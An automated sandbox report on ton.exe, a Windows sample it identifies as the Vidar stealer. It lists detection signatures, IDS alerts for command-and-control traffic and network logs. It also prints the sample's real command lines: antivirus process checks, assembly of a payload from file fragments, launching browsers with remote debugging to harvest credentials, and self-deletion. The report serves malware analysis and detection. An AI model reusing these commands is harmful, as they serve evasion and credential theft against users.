Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ton.exe

Overview

General Information

Sample name:ton.exe
Analysis ID:1567951
MD5:1ae543f386c7215e1c40f24c93179f77
SHA1:72e2c7c2303137507d1f320ecc506333487ae0d9
SHA256:17769137dcd00c16e0310c531df0e2f2281bae750da28d435b991c688e1a2ba2
Tags:77-105-161-126exeuser-1ZRR4H
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Vidar stealer
AI detected suspicious sample
Drops PE files with a suspicious file extension
Maps a DLL or memory area into another process
Monitors registry run keys for changes
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Copy From or To System Directory
Uses 32bit PE files

Classification

  • System is w10x64
  • ton.exe (PID: 988 cmdline: "C:\Users\user\Desktop\ton.exe" MD5: 1AE543F386C7215E1C40F24C93179F77)
    • cmd.exe (PID: 1224 cmdline: "C:\Windows\System32\cmd.exe" /c copy Batch Batch.cmd && Batch.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 5808 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5928 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 4924 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 1340 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 4508 cmdline: cmd /c md 471529 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 4152 cmdline: findstr /V "closingscriptsbeachescomplicated" Corners MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 3224 cmdline: cmd /c copy /b ..\Virtue + ..\Economies + ..\Downloading + ..\Gets + ..\Month + ..\Command + ..\Mean + ..\Violin + ..\Original I MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Verzeichnis.com (PID: 1616 cmdline: Verzeichnis.com I MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)
        • chrome.exe (PID: 5784 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
          • chrome.exe (PID: 7160 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2528 --field-trial-handle=2220,i,9226920140352858911,1917441030376040599,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
        • msedge.exe (PID: 1920 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: BF154738460E4AB1D388970E1AB13FAB)
          • msedge.exe (PID: 3876 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2716 --field-trial-handle=2508,i,14715817317759310349,9105508345091228975,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
        • cmd.exe (PID: 6060 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\RQI589ZCBA1V" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 1596 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • choice.exe (PID: 2012 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • msedge.exe (PID: 3568 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 5440 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1952,i,2601087111919839350,15526603101436537021,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • identity_helper.exe (PID: 6740 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6108 --field-trial-handle=1952,i,2601087111919839350,15526603101436537021,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • identity_helper.exe (PID: 1412 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6108 --field-trial-handle=1952,i,2601087111919839350,15526603101436537021,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • msedge.exe (PID: 6876 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7028 --field-trial-handle=1952,i,2601087111919839350,15526603101436537021,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 1576 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7200 --field-trial-handle=1952,i,2601087111919839350,15526603101436537021,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Verzeichnis.com I, ParentImage: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.com, ParentProcessId: 1616, ParentProcessName: Verzeichnis.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 5784, ProcessName: chrome.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Batch Batch.cmd && Batch.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Batch Batch.cmd && Batch.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ton.exe", ParentImage: C:\Users\user\Desktop\ton.exe, ParentProcessId: 988, ParentProcessName: ton.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Batch Batch.cmd && Batch.cmd, ProcessId: 1224, ProcessName: cmd.exe

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Batch Batch.cmd && Batch.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1224, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 1340, ProcessName: findstr.exe
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-04T02:01:51.782022+010020442471Malware Command and Control Activity Detected159.69.102.165443192.168.2.649942TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-04T02:01:54.172667+010020518311Malware Command and Control Activity Detected159.69.102.165443192.168.2.649947TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-04T02:01:51.781811+010020490871A Network Trojan was detected192.168.2.649942159.69.102.165443TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: ton.exeReversingLabs: Detection: 15%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.9% probability
    Source: ton.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49700 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.6:49711 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.6:49806 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49919 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 159.69.102.165:443 -> 192.168.2.6:49924 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.30.17.174:443 -> 192.168.2.6:49988 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.30.17.174:443 -> 192.168.2.6:49998 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.190.177.85:443 -> 192.168.2.6:50021 version: TLS 1.2
    Source: ton.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\ton.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
    Source: C:\Users\user\Desktop\ton.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\471529Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\471529\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
    Source: chrome.exeMemory has grown: Private usage: 1MB later: 30MB

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.6:49942 -> 159.69.102.165:443
    Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 159.69.102.165:443 -> 192.168.2.6:49947
    Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 159.69.102.165:443 -> 192.168.2.6:49942
    Source: global trafficHTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
    Source: Joe Sandbox ViewIP Address: 13.107.246.40 13.107.246.40
    Source: Joe Sandbox ViewIP Address: 13.107.246.40 13.107.246.40
    Source: Joe Sandbox ViewIP Address: 23.96.180.189 23.96.180.189
    Source: Joe Sandbox ViewIP Address: 18.165.220.106 18.165.220.106
    Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
    Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DbN5n5YUtSNy7o2&MD=zyr2r5xC HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
    Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
